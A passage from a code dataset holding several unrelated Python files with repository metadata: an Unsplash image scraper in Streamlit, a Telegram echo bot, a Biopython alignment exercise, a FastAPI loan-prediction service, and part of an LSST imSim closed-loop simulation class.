"line_number": 43, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 43, "usage_type": "name"}, {"api_name": "discord.ext.commands.Context", "line_number": 49, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 49, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 65, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 47, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 47, "usage_type": "name"}, {"api_name": "discord.ext.commands.bot_has_permissions", "line_number": 48, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 48, "usage_type": "name"}, {"api_name": "discord.ext.commands.CommandNotFound", "line_number": 94, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 94, "usage_type": "name"}, {"api_name": "discord.ext.commands.NotOwner", "line_number": 98, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 98, "usage_type": "name"}, {"api_name": "discord.ext.commands.BotMissingPermissions", "line_number": 100, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 100, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 103, "usage_type": "call"}, {"api_name": "discord.Color.dark_orange", "line_number": 106, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 106, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.MissingPermissions", "line_number": 113, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 113, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 116, "usage_type": "call"}, {"api_name": "discord.Color.dark_orange", "line_number": 119, "usage_type": "call"}, 
{"api_name": "discord.Color", "line_number": 119, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.CommandOnCooldown", "line_number": 129, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 129, "usage_type": "name"}, {"api_name": "utils.entry_helper.Converters.fix_time", "line_number": 130, "usage_type": "call"}, {"api_name": "utils.entry_helper.Converters", "line_number": 130, "usage_type": "name"}, {"api_name": "discord.Forbidden", "line_number": 132, "usage_type": "attribute"}, {"api_name": "asyncio.TimeoutError", "line_number": 134, "usage_type": "attribute"}, {"api_name": "discord.NotFound", "line_number": 136, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 139, "usage_type": "call"}, {"api_name": "discord.Color.dark_red", "line_number": 144, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 144, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Cog.listener", "line_number": 92, "usage_type": "call"}, {"api_name": "discord.ext.commands.Cog", "line_number": 92, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 92, "usage_type": "name"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 154, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 154, "usage_type": "name"}, {"api_name": "discord.utils.escape_markdown", "line_number": 159, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 159, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.group", "line_number": 150, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 150, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 151, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 151, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 163, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 163, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 211, "usage_type": "call"}, {"api_name": "discord.Color.orange", "line_number": 211, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 211, "usage_type": "attribute"}, {"api_name": "discord.Forbidden", "line_number": 220, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 204, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 204, "usage_type": "name"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 264, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 264, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 264, "usage_type": "name"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 227, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 227, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 272, "usage_type": "attribute"}, {"api_name": "discord.Guild", "line_number": 274, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 278, "usage_type": "call"}, {"api_name": "json.JSONDecodeError", "line_number": 279, "usage_type": "attribute"}, {"api_name": "discord.utils.escape_markdown", "line_number": 293, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 293, "usage_type": "attribute"}, {"api_name": 
"discord.utils.escape_mentions", "line_number": 300, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 300, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 302, "usage_type": "call"}, {"api_name": "discord.ext.commands.is_owner", "line_number": 271, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 271, "usage_type": "name"}, {"api_name": "utils.config.read", "line_number": 317, "usage_type": "call"}, {"api_name": "jishaku.paginators.PaginatorEmbedInterface", "line_number": 319, "usage_type": "call"}, {"api_name": "discord.ext.commands.Paginator", "line_number": 319, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.entry_helper.Case.from_dict", "line_number": 331, "usage_type": "call"}, {"api_name": "utils.entry_helper.Case", "line_number": 331, "usage_type": "name"}, {"api_name": "asyncio.sleep", "line_number": 334, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.User", "line_number": 342, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.group", "line_number": 305, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 305, "usage_type": "name"}, {"api_name": "discord.ext.commands.has_permissions", "line_number": 306, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 306, "usage_type": "name"}, {"api_name": "discord.ext.commands.bot_has_permissions", "line_number": 307, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 307, "usage_type": "name"}, {"api_name": "{'datetime': 'datetime.datetime', 'timedelta': 'datetime.timedelta', 'json': 'json'}", "line_number": 355, "usage_type": "call"}]} +{"seq_id": "72983801247", "text": "import streamlit as st\nimport requests\nfrom bs4 import BeautifulSoup\nimport webbrowser\n\nst.set_page_config(\n page_title=\"Web Scrapper\",\n page_icon=\"🌐\",\n layout=\"wide\"\n)\n\nst.markdown(\"<h1 style='text-align: center;'>Web Scrapper</h1>\", unsafe_allow_html=True)\n\nwith st.form(\"Busca\"):\n keyword = st.text_input(\"O que procura?\")\n search = st.form_submit_button(\"Buscar Imagens\")\n\nplaceholder = st.empty()\n\nif keyword:\n page = requests.get(f\"https://unsplash.com/s/photos/{keyword}\")\n soup = BeautifulSoup(page.content, \"lxml\")\n rows = soup.find_all(\"div\", class_=\"ripi6\")\n \n col1, col2, col3, col4 = placeholder.columns(4)\n\n for index, row in enumerate(rows):\n figures = row.find_all(\"figure\")\n for i in range(4):\n img = figures[i].find(\"img\", class_=\"tB6UZ a5VGX\")\n img_url = img[\"srcset\"].split(\"?\")[0]\n anchor = figures[i].find(\"a\", class_=\"rEAWd\")\n print(anchor[\"href\"])\n\n if i == 0:\n col1.image(img_url)\n btn = col1.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n print(\"Butão clicado\")\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 1:\n col2.image(img_url)\n btn = col2.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 2:\n col3.image(img_url)\n btn = col3.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")\n elif i == 3:\n col4.image(img_url)\n btn = col4.button(\"Donwload\", key=str(index) + \"_\" + str(i))\n if btn:\n 
webbrowser.open_new_tab(f\"https://unsplash.com/{anchor['href']}\")", "repo_name": "Joacy/streamlit-image-web-scrapper", "sub_path": "Web_Scrapper.py", "file_name": "Web_Scrapper.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 12, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 14, "usage_type": "call"}, {"api_name": "streamlit.text_input", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 16, "usage_type": "call"}, {"api_name": "streamlit.empty", "line_number": 18, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 22, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 40, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 45, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 50, "usage_type": "call"}, {"api_name": "webbrowser.open_new_tab", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "7930173411", "text": "from subprocess import Popen\r\nfrom subprocess import PIPE\r\n\r\nfrom telegram import Bot\r\nfrom telegram import Update\r\nfrom telegram.ext import Updater\r\nfrom telegram.ext import CommandHandler\r\nfrom telegram.ext import MessageHandler\r\nfrom telegram.ext import Filters\r\n\r\nfrom echo.config import *\r\n\r\n\r\ndef do_start(bot: Bot, update: Update):\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=\"Hello! Send me something please\"\r\n )\r\n\r\n\r\ndef do_echo(bot: Bot, update: Update):\r\n chat_id = update.message.chat_id\r\n text = \"Ваш ID = {}\\n\\n{}\".format(chat_id, update.message.text)\r\n bot.send_message(\r\n chat_id=chat_id,\r\n text=text\r\n )\r\n\r\n\r\ndef do_help(bot: Bot, update: Update):\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=\"Это учебный бот\\n\"\r\n \"Список доступных команд есть в меню\\n\"\r\n \"Так же я отвечу на любое сообщение\"\r\n )\r\n\r\n\r\ndef do_time(bot: Bot, update: Update):\r\n process = Popen([\"date\"], stdout=PIPE)\r\n text, error = process.communicate()\r\n\r\n if error:\r\n text = \"Произошла ошибка, время неизвестно\"\r\n else:\r\n text = text.decode(\"utf-8\")\r\n\r\n bot.send_message(\r\n chat_id=update.message.chat_id,\r\n text=text\r\n )\r\n\r\n\r\ndef main():\r\n config = load_config()\r\n\r\n bot = Bot(\r\n token=config.TG_TOKEN\r\n )\r\n updater = Updater(\r\n bot=bot\r\n )\r\n\r\n start_handler = CommandHandler(\"start\", do_start)\r\n help_handler = CommandHandler(\"help\", do_help)\r\n time_handler = CommandHandler(\"time\", do_time)\r\n message_handler = MessageHandler(Filters.text, do_echo)\r\n\r\n updater.dispatcher.add_handler(start_handler)\r\n updater.dispatcher.add_handler(help_handler)\r\n updater.dispatcher.add_handler(time_handler)\r\n updater.dispatcher.add_handler(message_handler)\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "repo_name": "olebas13/echo_bot", "sub_path": "echo/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "telegram.Bot", 
"line_number": 14, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 14, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 21, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 30, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 39, "usage_type": "name"}, {"api_name": "telegram.Update", "line_number": 39, "usage_type": "name"}, {"api_name": "subprocess.Popen", "line_number": 40, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 40, "usage_type": "name"}, {"api_name": "telegram.Bot", "line_number": 57, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 60, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 64, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 65, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 66, "usage_type": "call"}, {"api_name": "telegram.ext.MessageHandler", "line_number": 67, "usage_type": "call"}, {"api_name": "telegram.ext.Filters.text", "line_number": 67, "usage_type": "attribute"}, {"api_name": "telegram.ext.Filters", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "24198752656", "text": "from Bio import Align\r\nfrom Bio.Align import substitution_matrices\r\nfrom Bio import SeqIO\r\nseqlist = []\r\nfor seq_record in SeqIO.parse(\"rosalind_edta.txt\", \"fasta\"):\r\n seqlist += [str(seq_record.seq)]\r\nquery = seqlist[0]; target = seqlist[1]\r\naligner = Align.PairwiseAligner()\r\nmatrix = substitution_matrices.load(\"BLOSUM62\")\r\naligner.substitution_matrix = matrix\r\naligner.open_gap_score = -5\r\nalignment = aligner.align(query, target)\r\nscore = aligner.score(query, target)\r\nprint(score)", "repo_name": "GracelynHill/Rosalind-Answers", "sub_path": "question_18.py", "file_name": "question_18.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 5, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 5, "usage_type": "name"}, {"api_name": "Bio.Align.PairwiseAligner", "line_number": 8, "usage_type": "call"}, {"api_name": "Bio.Align", "line_number": 8, "usage_type": "name"}, {"api_name": "Bio.Align.substitution_matrices.load", "line_number": 9, "usage_type": "call"}, {"api_name": "Bio.Align.substitution_matrices", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "27200512957", "text": "from fastapi import FastAPI\nfrom pydantic import BaseModel\nimport joblib\nimport pandas as pd\nfrom imblearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\n\napp = FastAPI()\n\n# Models\nclass Applicant(BaseModel):\n Gender: str\n Married: str\n Dependents: int\n Education: str\n Self_Employed: str\n ApplicantIncome: int\n CoapplicantIncome: int\n LoanAmount: int\n Loan_Amount_Term: int\n Credit_History: int\n Property_Area: str\n Loan_Status: str\n\n# Import\nmodel_lr = joblib.load(\"model_lr.joblib\")\n\n# Routes\n@app.get(\"/\")\ndef home():\n return{'message': 'Hello World'}\n\n@app.post(\"/predict\")\ndef 
predict(data: Applicant):\n    inp_data = data.dict()\n    header = []\n    value = []\n    for key, val in inp_data.items():\n        header.append(key)\n        value.append(val)\n    \n    inp = pd.DataFrame([value], columns=header)\n    result = model_lr.predict(inp)\n    return {\"result\": result.tolist()}  # tolist() so FastAPI can serialize the numpy array", "repo_name": "yogifth/Project7-Machine-Learning", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1131, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "fastapi.FastAPI", "line_number": 13, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 16, "usage_type": "name"}, {"api_name": "joblib.load", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "29137945209", "text": "__all__ = [\"ClosedLoopTask\"]\n\nimport logging\nimport os\nimport shutil\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom glob import glob\n\nimport astropy\nimport numpy as np\nfrom lsst.afw.cameraGeom import FIELD_ANGLE, DetectorType\nfrom lsst.daf import butler as dafButler\nfrom lsst.ts.imsim.imsim_cmpt import ImsimCmpt\nfrom lsst.ts.imsim.obs_metadata import ObsMetadata\nfrom lsst.ts.imsim.opd_metrology import OpdMetrology\nfrom lsst.ts.imsim.sky_sim import SkySim\nfrom lsst.ts.imsim.utils import (\n    SensorWavefrontError,\n    get_camera,\n    get_config_dir,\n    make_dir,\n    plot_fwhm_of_iters,\n)\nfrom lsst.ts.ofc import OFC, OFCData\nfrom lsst.ts.wep.utils import CamType, FilterType, getCamNameFromCamType, getCamType\nfrom lsst.ts.wep.utils import getConfigDir as getWepConfigDir\nfrom lsst.ts.wep.utils import rotMatrix, runProgram\n\n\nclass ClosedLoopTask:\n    \"\"\"Closed loop task class to run the\n    simulation with imSim.\"\"\"\n\n    def __init__(self) -> None:\n        self.log = logging.getLogger(type(self).__name__)\n\n        # Sky simulator\n        self.sky_sim = None\n\n        # OFC calculator\n        self.ofc_calc = None\n\n        # imSim Component\n        self.imsim_cmpt = None\n\n        # Ra/Dec/RotAng coordinates used in the simulation.\n        self.boresight_ra = None\n        self.boresight_dec = None\n        self.boresight_rot_ang = None\n\n        # Use CCD image\n        self.use_ccd_img = True\n\n    def config_sky_sim(\n        self,\n        cam_type: CamType,\n        obs_metadata: ObsMetadata,\n        path_sky_file: str = \"\",\n        star_mag: float = 15.0,\n    ) -> None:\n        \"\"\"Configure the sky simulator.\n\n        If the path of the sky file is not provided, the default OPD field\n        positions will be used.\n\n        OPD: Optical path difference.\n\n        Parameters\n        ----------\n        cam_type : lsst.ts.wep.utils.CamType\n            Camera type.\n        obs_metadata : lsst.ts.imsim.ObsMetadata\n            Observation metadata.\n        path_sky_file : str, optional\n            Path to the sky file. (the default is \"\".)\n        star_mag : float, optional\n            Default star magnitude if there is no sky file used. This is to\n            pretend there are stars at the OPD field positions. 
(the default is\n 15.)\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n self.sky_sim = SkySim()\n self.sky_sim.set_camera(cam_type)\n if path_sky_file == \"\":\n self._set_sky_sim_based_on_opd_field_pos(cam_type, obs_metadata, star_mag)\n else:\n abs_sky_file_path = os.path.abspath(path_sky_file)\n self.sky_sim.add_star_by_file(abs_sky_file_path)\n\n def _set_sky_sim_based_on_opd_field_pos(\n self,\n cam_type: CamType,\n obs_metadata: ObsMetadata,\n star_mag: float,\n ) -> None:\n \"\"\"Set the sky simulator based on the OPD field positions.\n\n OPD: Optical path difference.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n star_mag : float\n Star magnitude. This is to pretend there are the stars at OPD field\n positions.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n self.log.info(\n \"Use the default OPD field positions to be star positions. \"\n f\"The star magnitude is chosen to be {star_mag}.\"\n )\n\n opd_metr = OpdMetrology()\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n field_x, field_y = list(), list()\n camera = get_camera(cam_type)\n for name in self.get_sensor_name_list_of_fields(cam_type):\n detector = camera.get(name)\n x_rad, y_rad = detector.getCenter(FIELD_ANGLE)\n x_deg, y_deg = np.rad2deg(x_rad), np.rad2deg(y_rad)\n field_y.append(x_deg) # transpose to convert from DVCS to CCS\n field_x.append(y_deg)\n opd_metr.field_x = field_x\n opd_metr.field_y = field_y\n else:\n raise ValueError(f\"This CamType ({cam_type}) is not supported.\")\n\n star_id = 0\n ra_in_deg_arr = np.array(opd_metr.field_x)\n dec_in_deg_arr = np.array(opd_metr.field_y)\n # Extra 180 degree rotation based upon this note:\n # https://lsstc.slack.com/archives/CHXKSF3HC/p1651863987821319?thread_ts=1651863934.274719&cid=CHXKSF3HC\n # that shows photons farthest from Zenith on sky appear on \"top\"\n # of focal plane.\n rotation = rotMatrix(\n obs_metadata.rotator_angle - obs_metadata.parallactic_angle + 180\n )\n for ra_in_deg, dec_in_deg in zip(ra_in_deg_arr, dec_in_deg_arr):\n # It is noted that the field position might be < 0. 
But it is\n # not the same case for ra (0 <= ra <= 360).\n ra_in_deg, dec_in_deg = np.dot(rotation, np.array([ra_in_deg, dec_in_deg]))\n ra_in_deg += obs_metadata.ra\n dec_in_deg += obs_metadata.dec\n if ra_in_deg < 0:\n ra_in_deg += 360.0\n self.sky_sim.add_star_by_ra_dec_in_deg(\n star_id, ra_in_deg, dec_in_deg, star_mag\n )\n star_id += 1\n\n def config_ofc_calc(self, cam_type: str) -> None:\n \"\"\"Configure the OFC calculator.\n\n OFC: Optical feedback calculator.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n \"\"\"\n\n self.ofc_calc = OFC(OFCData(getCamNameFromCamType(cam_type)))\n\n def map_filter_ref_to_g(self, filter_type_name: str) -> str:\n \"\"\"Map the reference filter to the G filter.\n\n Parameters\n ----------\n filter_type_name : str\n Filter type name: ref (or ''), u, g, r, i, z, or y.\n\n Returns\n -------\n filter_type_name : str\n Mapped filter type.\n \"\"\"\n return \"g\" if filter_type_name in (\"ref\", \"\") else filter_type_name\n\n def check_boresight(self, boresight: list[float]) -> None:\n \"\"\"Check the boresight.\n\n Parameters\n ----------\n boresight : list[float]\n Boresight [ra, dec] in degree.\n\n Raises\n ------\n ValueError\n The right ascension (RA) should be in [0, 360].\n ValueError\n The declination (Dec) should be in [-90, 90].\n \"\"\"\n\n ra, dec = boresight\n if ra < 0 or ra > 360:\n raise ValueError(\"The right ascension (RA) should be in [0, 360].\")\n\n if dec < -90 or dec > 90:\n raise ValueError(\"The declination (Dec) should be in [-90, 90].\")\n\n def get_sensor_name_list_of_fields(self, cam_type: CamType) -> list[str]:\n \"\"\"Get the list of sensor name of fields.\n\n The list will be sorted based on the field index.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n\n Returns\n -------\n list[str]\n List of sensor name.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n camera = get_camera(cam_type)\n detector_type = (\n DetectorType.WAVEFRONT\n if cam_type == CamType.LsstCam\n else DetectorType.SCIENCE\n )\n return [\n detector.getName()\n for detector in camera\n if detector.getType() == detector_type\n ]\n\n def get_sensor_id_list_of_fields(self, cam_type: CamType) -> list[int]:\n \"\"\"Get the list of sensor ids of fields.\n\n The list will be sorted based on the field index.\n\n Parameters\n ----------\n cam_type : lsst.ts.wep.utils.CamType\n Camera type.\n\n Returns\n -------\n list[int]\n List of sensor ids.\n\n Raises\n ------\n ValueError\n This instrument name is not supported.\n \"\"\"\n\n camera = get_camera(cam_type)\n\n detector_type = (\n DetectorType.WAVEFRONT\n if cam_type == CamType.LsstCam\n else DetectorType.SCIENCE\n )\n return [\n detector.getId()\n for detector in camera\n if detector.getType() == detector_type\n ]\n\n def check_and_create_base_output_dir(self, base_output_dir: str) -> str:\n \"\"\"Check and create the base output directory.\n\n This function will create the directory if it does not exist.\n\n Parameters\n ----------\n base_output_dir : str\n Base output directory.\n\n Returns\n -------\n str\n Base output directory.\n \"\"\"\n output_dir = base_output_dir\n make_dir(output_dir, exist_ok=True)\n\n return output_dir\n\n def get_filter_type(self, filter_type_name: str) -> FilterType:\n \"\"\"Get the filter type.\n\n Parameters\n ----------\n filter_type_name : str\n Filter type name: ref, u, g, r, i, z, or y.\n\n Returns\n -------\n lsst.ts.wep.utils.FilterType\n Filter type.\n\n Raises\n 
------\n ValueError\n This filter type is not supported.\n \"\"\"\n\n if filter_type_name in {\"\", \"ref\"}:\n return FilterType.REF\n elif filter_type_name == \"u\":\n return FilterType.LSST_U\n elif filter_type_name == \"g\":\n return FilterType.LSST_G\n elif filter_type_name == \"r\":\n return FilterType.LSST_R\n elif filter_type_name == \"i\":\n return FilterType.LSST_I\n elif filter_type_name == \"z\":\n return FilterType.LSST_Z\n elif filter_type_name == \"y\":\n return FilterType.LSST_Y\n else:\n raise ValueError(f\"This filter type ({filter_type_name}) is not supported.\")\n\n def _run_sim(\n self,\n cam_type: CamType,\n obs_metadata: ObsMetadata,\n base_output_dir: str,\n butler_root_path: str,\n sky_seed: int,\n pert_seed: int,\n iter_num: int,\n num_pro: int = 1,\n pipeline_file: str = \"\",\n imsim_config_pointer_file: str = \"\",\n turn_off_sky_background: bool = False,\n turn_off_atmosphere: bool = False,\n ) -> None:\n \"\"\"Run the simulation.\n\n Parameters\n ----------\n cam_type : enum 'CamType' in lsst.ts.wep.utility\n Camera type.\n obs_metadata : lsst.ts.imsim.ObsMetadata object\n Observation metadata.\n base_output_dir : str\n Base output directory.\n butler_root_path : str\n Path to the butler gen 3 repository.\n sky_seed : int\n Random seed for the sky background.\n pert_seed : int\n Random seed for the perturbations.\n iter_num : int\n Number of closed-loop iteration.\n num_pro : int, optional\n Number of processors to use. (The default is 1.)\n pipeline_file : str, optional\n Path to existing pipeline yaml file to use. If empty string\n then the code will write its own default pipeline yaml.\n (The default is \"\".)\n imsim_config_pointer_file : str, optional\n Path to pointer file with locations of yaml configuration\n files for imsim submodules. If empty string then the code\n will use the default in policy/config for the given inst.\n (The default is \"\".)\n turn_off_sky_background : bool, optional\n If set to True then the closed loop will simulate images\n without sky background. 
(The default is False.)\n turn_off_atmosphere : bool, optional\n If set to True then will turn off the imsim atmosphere.\n (The default is False.)\n \"\"\"\n state_0 = self.ofc_calc.ofc_controller.aggregated_state\n self.imsim_cmpt.dof_in_um = state_0\n\n # If using wavefront sensors we measure one per pair\n # and the field\n if cam_type == CamType.LsstCam:\n corner_sensor_name_list = self.get_sensor_name_list_of_fields(cam_type)\n corner_sensor_id_list = self.get_sensor_id_list_of_fields(cam_type)\n ref_sensor_name_list = []\n ref_sensor_id_list = []\n for sens_name, sens_id in zip(\n corner_sensor_name_list, corner_sensor_id_list\n ):\n if sens_name.endswith(\"SW0\"):\n ref_sensor_name_list.append(sens_name)\n ref_sensor_id_list.append(sens_id)\n else:\n ref_sensor_name_list = self.get_sensor_name_list_of_fields(cam_type)\n ref_sensor_id_list = self.get_sensor_id_list_of_fields(cam_type)\n\n # Common file and directory names\n opd_zk_file_name = \"opd.zer\"\n opd_pssn_file_name = \"PSSN.txt\"\n output_dir_name = \"pert\"\n output_img_dir_name = \"img\"\n iter_default_dir_name = \"iter\"\n dof_in_um_file_name = \"dofPertInNextIter.mat\"\n fwhm_iters_file_name = \"fwhmIters.png\"\n if pipeline_file == \"\":\n pipeline_file = None\n if imsim_config_pointer_file == \"\":\n imsim_config_pointer_file = None\n\n # Specific file names to the amplifier/eimage\n wfs_zk_file_name = \"wfs.zer\"\n\n # Do the iteration\n seq_num = 1000\n\n for iter_count in range(iter_num):\n # Set the observation sequence number\n obs_metadata.seq_num = seq_num + iter_count * 10\n\n # The iteration directory\n iter_dir_name = \"%s%d\" % (iter_default_dir_name, iter_count)\n\n # Set the output directory\n output_dir = os.path.join(base_output_dir, iter_dir_name, output_dir_name)\n make_dir(output_dir)\n self.imsim_cmpt.output_dir = output_dir\n\n # Set the output image directory\n output_img_dir = os.path.join(\n base_output_dir, iter_dir_name, output_img_dir_name\n )\n make_dir(output_img_dir)\n self.imsim_cmpt.output_img_dir = output_img_dir\n\n # Generate the sky images and calculate the wavefront error\n if cam_type == CamType.LsstCam:\n self._generate_images(\n obs_metadata,\n cam_type=cam_type,\n sky_seed=sky_seed,\n pert_seed=pert_seed,\n num_pro=num_pro,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n elif cam_type in [CamType.LsstFamCam, CamType.ComCam]:\n for focus_z in [-1.5, 1.5]:\n obs_metadata.seq_num += 1\n obs_metadata.focus_z = focus_z\n self._generate_images(\n obs_metadata,\n cam_type=cam_type,\n sky_seed=sky_seed,\n pert_seed=pert_seed,\n num_pro=num_pro,\n imsim_config_pointer_file=imsim_config_pointer_file,\n turn_off_sky_background=turn_off_sky_background,\n turn_off_atmosphere=turn_off_atmosphere,\n )\n\n # Analyze the OPD data\n self.imsim_cmpt.analyze_opd_data(\n cam_type,\n zk_file_name=opd_zk_file_name,\n rot_opd_in_deg=obs_metadata.rotator_angle,\n pssn_file_name=opd_pssn_file_name,\n )\n\n if self.use_ccd_img:\n if cam_type in [CamType.LsstCam, CamType.LsstFamCam, CamType.ComCam]:\n list_of_wf_err = self._calc_wf_err_from_img(\n obs_metadata,\n butler_root_path=butler_root_path,\n cam_type=cam_type,\n num_pro=num_pro,\n pipeline_file=pipeline_file,\n )\n else:\n list_of_wf_err = self.imsim_cmpt.map_opd_data_to_list_of_wf_err(\n opd_zk_file_name, ref_sensor_id_list, ref_sensor_name_list\n )\n\n # Get the PSSN from file\n pssn = 
